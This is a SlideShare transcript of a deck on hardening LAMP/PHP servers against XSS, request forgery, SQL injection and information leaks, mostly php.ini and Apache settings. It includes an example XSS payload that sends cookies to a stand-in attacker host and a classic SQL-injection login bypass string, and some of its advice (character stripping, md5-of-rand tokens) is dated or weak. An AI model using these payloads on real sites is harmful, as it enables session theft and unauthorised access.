SlideShare a Scribd company logo

LAMP security practices

Download as ODP, PDF
Amit Kejriwal
Amit Kejriwal
Technology
1 of 19
LAMP Security Practices XSS Request Forgeries SQL Injection Disable PHP, Apache, OS information Disable unnecessary modules Log PHP errors Disable/Limit file uploads DoS attack Remote Code execution Disable dangerous PHP functions Limit access to file system
XSS A hacker posts the below given code snippet in the comment section of website http://exsite.com. Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script> The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hacker's site (http://evilhacker.org):- Note that cookie data may have my login credentials which you as a hacker can use to
XSS solution All user submitted content should be filtered and all the disallowed characters should be removed In particular <, >, and all html tags should be stripped
Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
SQL Injection Ex. Input ' OR '1'='1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = '$_GET['userid']' ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = '' OR '1'='1' ” which will result in valid records getting returned from database.
SQL Injection Solution Use mysqli_real_escape_string($_GET['userid']) for all user supplied data Use prepared statements:- $statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" ); $statement->bind_param( "i", $_GET['userid'] ); $statement->execute();
Disable PHP information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 The output shows that the sites runs on PHP and the version of PHP as well Disable the information by setting expose_php=off in php.ini
Disable Server Information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) The output shows Apache server, its version, and OS Ubuntu information Disable these information by setting ServerSignature Off ServerTokens Prod in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
Disable unnecessary modules Use php -m to check list of enabled modules Disable modules like gd if not required On Ubuntu, goto folder /etc/php5/conf.d Run: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
Log PHP errors Use following to hide PHP error messages to be diaplayed to site users display_errors = Off Use following to log the PHP error messages into a log file log_errors = On error_log = /var/log/httpd/php-error.log For realtime monitoring of php error log use:- tail -f /var/log/httpd/php-error.log
Disable File Uploads If your site doesnt want file upload functionality, remove it from php.ini :- file_uploads = Off If your site wants file upload functionality, set it to only the required minimum value :- file_upload = On upload_max_size = 1M
DoS attack To avoid script taking an infinite time and bringing down the server, use following settings:- max_execution_time = 30 max_input_time = 30 memory_limit = 40M
Remote Code Execution Remote urls can be opened by PHP functions like fopen, file_get_contents, include, require These remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully. To restrict remote file opening:- allow_url_fopen = Off allow_url_include = Off
Disable Dangerous PHP functions Use following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :- disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
Limit Access to File System Use following to restrict PHP's access to parts of file system:- open_basedir="/var/www/html/" The above will not allow PHP access to parts of file system like /etc or /tmp etc.
Session file path Session files must be saved away from the web site folder. Use following to change session files location:- session.save_path="/var/lib/php/session" upload_tmp_dir="/var/lib/php/upload"
Write protect conf and application files Use chattr +i command to write protect any file chattr +i /etc/php5/php.ini chattr +i /etc/mysql/my.cnf chattr +i /etc/apache2/apache2.conf chattr +i /var/www/html/ Such files then can not be modified even by root user. Use chattr -i command to revert back the write protection
Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdf http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html

Recommended

How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...CloudMinister Technologies Pvt. Ltd
 
Presentation (PPT)
Presentation (PPT)Presentation (PPT)
Presentation (PPT)webhostingguy
 
Making the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolMaking the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
 
Rits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRight IT Services
 
Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1beckman16
 
A 2-2 php on windows azure
A 2-2 php on windows azureA 2-2 php on windows azure
A 2-2 php on windows azureGoAzure
 
PHP on Windows Azure
PHP on Windows Azure PHP on Windows Azure
PHP on Windows Azure Microsoft Openness Japan
 
Serving Moodle Presentation
Serving Moodle PresentationServing Moodle Presentation
Serving Moodle Presentationwebhostingguy
 

Recommended

How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...CloudMinister Technologies Pvt. Ltd
 
Presentation (PPT)
Presentation (PPT)Presentation (PPT)
Presentation (PPT)webhostingguy
 
Making the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolMaking the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
 
Rits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRight IT Services
 
Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1beckman16
 
A 2-2 php on windows azure
A 2-2 php on windows azureA 2-2 php on windows azure
A 2-2 php on windows azureGoAzure
 
PHP on Windows Azure
PHP on Windows Azure PHP on Windows Azure
PHP on Windows Azure Microsoft Openness Japan
 
Serving Moodle Presentation
Serving Moodle PresentationServing Moodle Presentation
Serving Moodle Presentationwebhostingguy
 
Install
InstallInstall
Installmrdisconnect9
 
Databases and MySQL
Databases and MySQLDatabases and MySQL
Databases and MySQLThings Lab
 
Prod java-error
Prod java-errorProd java-error
Prod java-errorRamakrishna Chava
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015Shaiffulnizam Mohamad
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0py_sunil
 
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation Geminate Consultancy Services
 
Config websocket on apache
Config websocket on apacheConfig websocket on apache
Config websocket on apachebaran19901990
 
PHP Programming: Intro
PHP Programming: IntroPHP Programming: Intro
PHP Programming: IntroThings Lab
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5RaGaZoMe
 
Oracle on Solaris
Oracle on SolarisOracle on Solaris
Oracle on SolarisTelkom Institute of Management
 
Doc quickinstall 3.x
Doc quickinstall 3.xDoc quickinstall 3.x
Doc quickinstall 3.xsetankecos
 
Introduction to Flow3
Introduction to Flow3Introduction to Flow3
Introduction to Flow3Web Essentials Co., Ltd.
 
Cent os 5 ssh
Cent os 5 sshCent os 5 ssh
Cent os 5 sshAlejandro Besne
 
Power shell
Power shellPower shell
Power shellRajkiran Swain
 
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityMuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityakashdprajapati
 
Sql related links
Sql related linksSql related links
Sql related linksEmmanuel Mugume Joshua
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessionssalissal
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation InstructionsPilot Group Ltd
 
Ec2 Commands
Ec2 CommandsEc2 Commands
Ec2 Commandssnusmumrik
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 

More Related Content

What's hot

Databases and MySQL
Databases and MySQLDatabases and MySQL
Databases and MySQLThings Lab
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0py_sunil
 
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation Geminate Consultancy Services
 
Config websocket on apache
Config websocket on apacheConfig websocket on apache
Config websocket on apachebaran19901990
 
PHP Programming: Intro
PHP Programming: IntroPHP Programming: Intro
PHP Programming: IntroThings Lab
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5RaGaZoMe
 
Doc quickinstall 3.x
Doc quickinstall 3.xDoc quickinstall 3.x
Doc quickinstall 3.xsetankecos
 
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityMuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityakashdprajapati
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessionssalissal
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation InstructionsPilot Group Ltd
 

What's hot (20)

Install
InstallInstall
Install
 
Databases and MySQL
Databases and MySQLDatabases and MySQL
Databases and MySQL
 
Prod java-error
Prod java-errorProd java-error
Prod java-error
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015
 
End to end web security
End to end web securityEnd to end web security
End to end web security
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0
 
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
 
Config websocket on apache
Config websocket on apacheConfig websocket on apache
Config websocket on apache
 
PHP Programming: Intro
PHP Programming: IntroPHP Programming: Intro
PHP Programming: Intro
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5
 
Oracle on Solaris
Oracle on SolarisOracle on Solaris
Oracle on Solaris
 
Doc quickinstall 3.x
Doc quickinstall 3.xDoc quickinstall 3.x
Doc quickinstall 3.x
 
Introduction to Flow3
Introduction to Flow3Introduction to Flow3
Introduction to Flow3
 
Cent os 5 ssh
Cent os 5 sshCent os 5 ssh
Cent os 5 ssh
 
Power shell
Power shellPower shell
Power shell
 
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityMuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
 
Sql related links
Sql related linksSql related links
Sql related links
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessions
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation Instructions
 
Ec2 Commands
Ec2 CommandsEc2 Commands
Ec2 Commands
 

Viewers also liked

2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Webdpd
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin PartnersFabio Lombardi
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Fabien Potencier
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Security
 

Viewers also liked (10)

2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security Tutorial
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutions
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin Partners
 
Web application Security
Web application SecurityWeb application Security
Web application Security
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security Overview
 
Web Security
Web SecurityWeb Security
Web Security
 

Similar to LAMP security practices

Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Servermanugoel2003
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSigsiu.NET
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: BackendVõ Duy Tuấn
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHDavid Stockton
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationChetan Soni
 
Lecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.pptLecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.pptSreejithVP7
 
PHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for phpPHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for phpaimaq9a
 

Similar to LAMP security practices (20)

Download It
Download ItDownload It
Download It
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Server
 
Web Security
Web SecurityWeb Security
Web Security
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! website
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
4.4 PHP Session
4.4 PHP Session4.4 PHP Session
4.4 PHP Session
 
secure php
secure phpsecure php
secure php
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Web application security
Web application securityWeb application security
Web application security
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and Configuration
 
Lecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.pptLecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.ppt
 
PHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for phpPHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for php
 

Recently uploaded

Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 

Recently uploaded (20)

Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

LAMP security practices

